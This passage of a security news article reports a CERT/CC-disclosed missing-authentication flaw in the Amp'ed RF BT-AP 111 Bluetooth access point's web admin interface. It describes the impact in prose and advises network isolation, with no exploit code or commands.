    This flaw affects the device’s HTTP-based administrative interface, which manages critical functions including Bluetooth configurations, network parameters, and security settings.

    The BT-AP 111 supports Universal Plug and Play (UPnP) on the Ethernet side and can handle up to seven simultaneous Bluetooth connections through its UART Serial interface.

    Carnegie Mellon University analysts identified this vulnerability through CERT Coordination Center research, highlighting the device’s failure to implement baseline security controls.

    The researchers noted that this configuration violates established NIST security guidelines, particularly SP 800-121 Rev. 2, which mandates authentication for Bluetooth devices at Service Level 2 or higher.

    Authentication Bypass Mechanism

    The vulnerability stems from a complete absence of authentication mechanisms in the device’s web interface architecture.

    Unlike typical network devices that implement login screens or certificate-based authentication, the BT-AP 111 directly exposes its administrative panel to any user accessing its HTTP port.

    This design flaw allows attackers to modify device configurations, alter Bluetooth pairing settings, and potentially intercept or manipulate data flowing through the bridge.

    The exploitation vector requires only network connectivity to the target device, making it accessible to both local network attackers and, in misconfigured environments, remote threats.

    Given the vendor’s lack of response to disclosure efforts, security professionals recommend isolating affected devices on segregated network segments inaccessible to untrusted users until proper authentication controls can be implemented.

    Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.

    The post Amp’ed RF BT-AP 111 Bluetooth Access Point Vulnerability Let Attackers Gain Full Admin Access appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶